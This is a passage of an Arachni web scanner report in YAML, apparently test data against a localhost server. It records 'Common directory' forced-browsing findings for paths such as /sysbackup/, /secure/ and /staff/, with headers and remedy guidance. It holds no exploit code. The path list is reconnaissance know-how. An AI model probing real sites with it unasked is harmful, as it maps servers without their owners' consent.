elem: path
remarks: {}
method: ''
response: old_files
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/secure/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/secure/
injected: secure
id: secure
elem: path
remarks: {}
method: ''
response: secure
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/sysbackup/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/sysbackup/
injected: sysbackup
id: sysbackup
elem: path
remarks: {}
method: ''
response: sysbackup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/temp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/temp/
injected: temp
id: temp
elem: path
remarks: {}
method: ''
response: temp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/code/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/code/
injected: code
id: code
elem: path
remarks: {}
method: ''
response: code
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/secured/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/secured/
injected: secured
id: secured
elem: path
remarks: {}
method: ''
response: secured
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/staff/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/staff/
injected: staff
id: staff
elem: path
remarks: {}
method: ''
response: staff
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/src/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/src/
injected: src
id: src
elem: path
remarks: {}
method: ''
response: src
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/manage/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/manage/
injected: manage
id: manage
elem: path
remarks: {}
method: ''
response: manage
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/personal/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/personal/
injected: personal
id: personal
elem: path
remarks: {}
method: ''
response: personal
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/publish/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/publish/
injected: publish
id: publish
elem: path
remarks: {}
method: ''
response: publish
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/system/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/system/
injected: system
id: system
elem: path
remarks: {}
method: ''
response: system
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/work/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/work/
injected: work
id: work
elem: path
remarks: {}
method: ''
response: work
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/tests/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/tests/
injected: tests
id: tests
elem: path
remarks: {}
method: ''
response: tests
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/stuff/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/stuff/
injected: stuff
id: stuff
elem: path
remarks: {}
method: ''
response: stuff
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/update/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/update/
injected: update
id: update
elem: path
remarks: {}
method: ''
response: update
headers:
request:
